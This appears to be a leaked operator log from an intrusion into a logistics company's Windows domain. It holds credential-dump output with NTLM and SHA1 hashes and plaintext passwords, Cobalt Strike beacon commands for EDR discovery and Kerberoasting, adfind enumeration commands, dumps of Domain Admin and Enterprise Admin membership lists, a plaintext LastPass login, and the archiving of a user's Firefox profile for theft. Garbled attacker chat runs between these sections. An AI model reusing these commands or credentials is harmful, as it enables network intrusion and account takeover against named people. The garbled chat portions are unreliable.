Logon Time : 10/23/2020 10:17:14 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4079058940 (00000000:f3217ffc)
Session : Service from 0
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/21/2020 6:31:26 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 3660849891 (00000000:da3422e3)
Session : RemoteInteractive from 13
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/13/2020 8:51:02 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3465255253 (00000000:ce8b9955)
Session : Interactive from 14
User Name : DWM-14
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/9/2020 1:34:11 PM
SID : S-1-5-90-14
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 0 ; 3411885558 (00000000:cb5d3df6)
Session : RemoteInteractive from 1
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/8/2020 3:00:26 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 504788382 (00000000:1e16759e)
Session : RemoteInteractive from 7
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/20/2020 11:56:26 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 116428327 (00000000:06f08e27)
Session : RemoteInteractive from 4
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/14/2020 12:56:27 PM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1181016 (00000000:00120558)
Session : RemoteInteractive from 2
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/12/2020 11:34:38 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : ADC03-PHX01$
Domain : GLOBALNET
Logon Server : (null)
Logon Time : 8/12/2020 11:30:58 PM
SID : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : adc03-phx01$
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 73224 (00000000:00011e08)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 8/12/2020 11:30:50 PM
SID :
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 3842484810 (00000001:e507aa4a)
Session : Interactive from 0
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 12/2/2020 12:01:27 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : globalnet.local
	 * Password : Splat_9550!
	ssp :
	credman :

Authentication Id : 1 ; 2401291807 (00000001:8f20ce1f)
Session : RemoteInteractive from 27
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/17/2020 10:27:35 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1683096786 (00000001:645204d2)
Session : RemoteInteractive from 24
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/10/2020 3:12:11 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1184016058 (00000001:4692a6ba)
Session : RemoteInteractive from 22
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/5/2020 7:30:15 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 462032262 (00000001:1b8a0d86)
Session : RemoteInteractive from 19
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/28/2020 1:54:05 PM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4281980116 (00000000:ff39d4d4)
Session : RemoteInteractive from 18
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/23/2020 10:17:14 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4045964244 (00000000:f12883d4)
Session : RemoteInteractive from 17
User Name : ctrails2
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/20/2020 5:00:44 PM
SID : S-1-5-21-498103351-3997332795-3100871051-12967
	msv :
	 [00000003] Primary
	 * Username : ctrails2
	 * Domain : GLOBALNET
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	 [00010000] CredentialKeys
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	tspkg :
	wdigest :
	 * Username : ctrails2
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ctrails2
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 4045959606 (00000000:f12871b6)
Session : Interactive from 17
User Name : DWM-17
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/20/2020 5:00:44 PM
SID : S-1-5-90-17
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 0 ; 3751704448 (00000000:df9e7780)
Session : RemoteInteractive from 16
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/15/2020 1:35:54 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3729906510 (00000000:de51db4e)
Session : RemoteInteractive from 15
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/14/2020 4:06:50 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3288541437 (00000000:c40328fd)
Session : RemoteInteractive from 12
User Name : joel.reed
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/6/2020 10:44:37 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15177
	msv :
	 [00000003] Primary
	 * Username : joel.reed
	 * Domain : GLOBALNET
	 * NTLM : 7d9d843800ed5d922b69507f2dd2cfda
	 * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e
	 [00010000] CredentialKeys
	 * NTLM : 7d9d843800ed5d922b69507f2dd2cfda
	 * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e
	tspkg :
	wdigest :
	 * Username : joel.reed
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : joel.reed
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 3288541401 (00000000:c40328d9)
Session : RemoteInteractive from 12
User Name : joel.reed
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/6/2020 10:44:37 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15177
	msv :
	 [00000003] Primary
	 * Username : joel.reed
	 * Domain : GLOBALNET
	 * NTLM : 7d9d843800ed5d922b69507f2dd2cfda
	 * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e
	 [00010000] CredentialKeys
	 * NTLM : 7d9d843800ed5d922b69507f2dd2cfda
	 * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e
	tspkg :
	wdigest :
	 * Username : joel.reed
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : joel.reed
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 2087392369 (00000000:7c6b1471)
Session : RemoteInteractive from 11
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/16/2020 4:44:41 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1983891583 (00000000:763fc87f)
Session : RemoteInteractive from 10
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/14/2020 1:20:20 PM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1638269471 (00000000:61a6021f)
Session : RemoteInteractive from 9
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/8/2020 11:31:51 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 504788415 (00000000:1e1675bf)
Session : RemoteInteractive from 7
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/20/2020 11:56:26 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 472372604 (00000000:1c27d57c)
Session : RemoteInteractive from 6
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/20/2020 11:32:37 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 472372568 (00000000:1c27d558)
Session : RemoteInteractive from 6
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/20/2020 11:32:37 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 116428364 (00000000:06f08e4c)
Session : RemoteInteractive from 4
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/14/2020 12:56:27 PM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/12/2020 11:31:00 PM
SID : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	* kerberos :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	ssp :
	credman :
``Then it's time to sleep ``))`Did you manage to enter the main working domain with the EnterPrime? but I would have to look for the admin by the eta... yeah... as you can see the ing goes ``
beacon> edr_query localhost x64
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] ehdrv.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] ESET Found!
``````
beacon> powershell-import /home/trash/tools/Invoke-Kerberoast.ps1
[*] Tasked beacon to import: /home/trash/tools/Invoke-Kerberoast.ps1
[+] host called home, sent: 12760 bytes
beacon> psinject 10292 x64 Invoke-Kerberoast -OutputFormat HashCat | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl into 10292 (x64)
[+] host called home, sent: 133723 bytes
beacon> whoami
[-] Unknown command: whoami
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
globalnet\sraadmin

strange guys strangely they separated the prod but left the mutual trust this trust domain clerks will and hashes Dana DK you tamu 2008 server why? no access first dsink I'll take it down...I want to see if my pid will give try to call something from your process
fuck what
psinject for example some weak script or something
it doesn't matter, you're not alone, do you still have a session in the extended domain? ahem
listen
there's a lot of things to check = (noisy and they'll stay as artifacts for analysis = (no
a lot of randl processes will stay there and then we'll have to shellcode them when we'll have to work a lot and so with migra problems we'll have to think how to locate...two domains we can do a simple what? you jump with an interpreter and fix it?
 3.5MB fil 12/02/2020 18:11:39 ad_computers.txt
 2.1MB fil 12/02/2020 18:11:47 ad_group.txt
 159.8KB fil 12/02/2020 18:11:39 ad_ous.txt
 159B fil 12/02/2020 18:11:44 ad_subnets.txt
 445B fil 12/02/2020 18:11:53 ad_trustdmp.txt
 12.8MB fil 12/02/2020 18:11:35 ad_users.txt
foundsraadmin can't this account jump into the main domain directly? okmmmmmtk if you use a system batnick then it will come off then try another host or something
i can't get it off the polzak (memory protected) i can't get it on the systemdas polzak processes? what context are you trying to use?

ldap_get_next_page_s: [ADC02-PHX01.globalnet.local] Error 0x1 (1) - Operations Error

Uh-huh, wrong one.
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=person)" > ad_users.txt
adfind.exe -b DC=globalnet,DC=local -f "objectcategory=computer" > ad_computers.txt
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -b DC=globalnet,DC=local -subnets -f (objectCategory=subnet)> ad_subnets.txt
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=group)" > ad_group.txt
adfind.exe -b DC=globalnet,DC=local -gcb -sc trustdmp > ad_trustdmp.txt
``What am I doing wrong? Here is their entire cloud system in this domain``
For the full year, GlobalTranz reported $1.4 billion in revenue, representing 62 percent year-over-year growth, a net revenue increase of 63 percent, and EBITDA growth of 150 percent.
``````
About GlobalTranz
GlobalTranz is a technology company providing award-winning cloud-based multi-modal Transportation Management System (TMS) products to shippers, carriers, 3PLs and brokers. GlobalTranz is leading the logistics software and services market in innovative technology that optimizes the efficiency of freight movement and matches shipper demand and carrier capacity in real-time. Leveraging its extensive independent agent network, GlobalTranz has emerged as a fast-growing market leader with a customer base of over 1 million product users and 25,000 shippers. In 2018, Transport Topics named GlobalTranz a Top 10 largest freight brokerage firm in the U.S.
Take off the second domain, it's their prodadomain, it's the server domain
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
acerimeli Administrator amadeus
aporwal bkadmin Caleb.Maher
ctrails ctrails2 emontgomery
eric gnet_admin godonnell
GTZ.Kace gtz__ssrsadmin james.clark
jared.lauzon jason.heller jeff.tarnowski
jgettman jhess jhoegl
jklida joel.reed john.mohlman
leland.andersen macie.oyler mjscott
prtgpoller sblumenthal sdavids
sjose skyler.tisue sraadmin
svcadmin

``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
A.Maser aarora AC.Prod
Administrator ahaines alan.blythe
amitv aporwal appscheduler
backendscheduler bdadyala bgarrick
bkadmin bkeene Caleb.Maher
Carl.Fields CC.Prod christopher.collazo
cr2.prod ctrails ctrails2
darwin.porter datamigration dave.devore
david.duvall DB_SRVC dbtest
eric.scheerer feliciano.torres g.boles
gnet_admin godonnell GTZ.Kace
gtz__ssrsadmin j.pillon james.clark
james.obryant jared.lauzon jason.heller
jeff.tarnowski jehad.Jamalalldeen jhess
jklida jobryant joel.reed
john.mohlman keith.hodges kevin.foster
leland.andersen lyle.larsen m.maurer
m.wozniak macie.oyler maintenance
Martin.Owings Matthew.Schmidt mbellman
mgserrano mlinder mwall
p.brahmbhatt P.Malling prodagent
prtgpoller R.Felker R.Pettit
RC.Prod rkladmin robert.koogle
rpeeta russ.felker ryan.pettit
ryan.terry S.Mohammed sjose
skyler.tisue SQLP_RelicAdmin sraadmin
subin svcadmin tabadmin
Umair.Anis vpntest12 y.khasho
``````
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
a.bousquet
a.ocr
Administrator
ahaines
ahaines1
amadeus
bgarrick
bkadmin
bkeene
bsezairi
caleb.maher
cara.crawford
chris.provan
christopher.collazo
ctrails
ctrails2
Daniel.collazo
darwin.porter
dave.devore
DBuchert
derek.schmidt
docimg
Domain Admins
donelson
EDI
EDI204Service
EDI204Service1
Enterprise Admins
eric.scheerer
feliciano.torres
g.boles
g.serrano
gnbdad
gnet_admin
godonnell
GTZ.Kace
gtz__ssrsadmin
j.pillon
jalbenberg
james.clark
james.obryant
jared.lauzon
jason.heller
jbooth
jeff.tarnowski
Jehad.Jamalalldeen
jgettman
jgettman1
jhess
jhohman
joel.reed
john.mohlman
joseph.urbine
keith.hodges
leland.andersen
lyle.larsen
m.maurer
m.wozniak
macie.oyler
malannefeld
mason.sanchez
mbiesiada
mbiesiada1
mdbenjamin
mgserrano
mjgaines
mjscott
mleyshon
mlinder
mmbiesiada
mwall
nbowser
p.brahmbhatt
p.vuong
prtgpoller
rkladmin
rkrugg
robert.koogle
rstubbs128
russ.felker
ryan.pettit
ryan.terry
sblumenthal
sdavids
shanna.thomas
skyler.tisue
Snigdha
sraadmin
svcadmin
tabadmin
tmgauthier
ttessmer
y.khasho

``````
      ADC02-PHX01.globalnet.local [DS] Site: PHX01
      ADC03-PHX01.globalnet.local [PDC] [DS] Site: PHX01
    GTZAZRGNADC01.globalnet.local [DS] Site: Azure-WestUS
    GTZZRGNADC02.globalnet.local [DS] Site: Azure-WestUS
``yeaheah
Now we'll see))) well, let's gookaye bye bye all goodnight read all right, tomorrow by 3 then i searched among the domains) lol) aaaaaaand the logo as the children's world on the rightzoho where did you see it? i do not see her noticing a match and here it is on the screen this grid was at work so, so? do not understanda here is such a coincidencea we were just poking ita what's wrong with it? #zohocorpin-com zohofiles delete)yes, sessions in the slip until tomorrow then and for today all will have time to get on rdto tomorrow to 301:12 PM`https://lastpass.com mharper@waterway.com LoveUnit14` and give shell timea logicalokayot system try it from his context? hehe`d you take away?

7-Zip (a) 18.05 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30

Scanning the drive:
2156 folders, 6028 files, 362713974 bytes (346 MiB)

Creating archive: ff.7z

Add new data to archive: 2156 folders, 6028 files, 362713974 bytes (346 MiB)


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cert9.db


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\content-prefs.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cookies.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cookies.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite-wal


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\formhistory.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\key4.db


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\permissions.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite-wal


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\protections.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite-wal


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\weave\bookmarks.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite-wal


[+] received output:

Files read from disk: 6012
Archive size: 168244956 bytes (161 MiB)

WARNINGS for files:

krbjz40r.default-1588080079106\cert9.db : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\content-prefs.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cookies.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cookies.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite-wal : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\formhistory.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\key4.db : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\permissions.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite-wal : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\protections.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite-wal : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\weave\bookmarks.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite-wal : The process cannot access the file because it is being used by another process.
----------------
WARNING: Cannot open 22 files

The blue one is the same as the one you put in the coboo where the session from it hangs in theC:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\get me[ ](https://mediaeveryone.com/group/waterway-com?msg=rPWgFMijrSLESh3nM) and so on, we renamed it as native if anything, did you delete your files and put it in the original folder with your profile?i don't know how to check if it's ok, but i've already tried it, ff won't pick up the profile he put in the folder. if everything is ok, tomorrow let's close it quietly and check access to this URLGet the folder with his ff profile in the archive and dedicate it if not, by 4tomorrow by 6 and if everything is ok, i thought these guys switched to paper and hand the access by Planes)
30203 http://192.168.0.75/
30824 https://192.168.0.75/
30825 https://192.168.0.75/#/login
30826 https://192.168.0.75/#/dashboard
30827 https://192.168.0.75/#/manage/storage/group/volumes/summary
30828 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/summary
30829 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/data_access/connections
30830 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/data_access/access
30831 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000007/summary
30832 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000007/data_protection
30833 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/summary
30834 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_protection
30835 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_access/connections
30836 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_access/access
30837 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/edit?startTabIndex=3
30890 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000034/summary
``Bingo eat))``ww-nimble-01 ``https://192.168.0.75/#/login`` basic
nimbles:
    https://192.168.0.42
    https://192.168.0.43
    https://192.168.0.75
    https://192.168.0.77
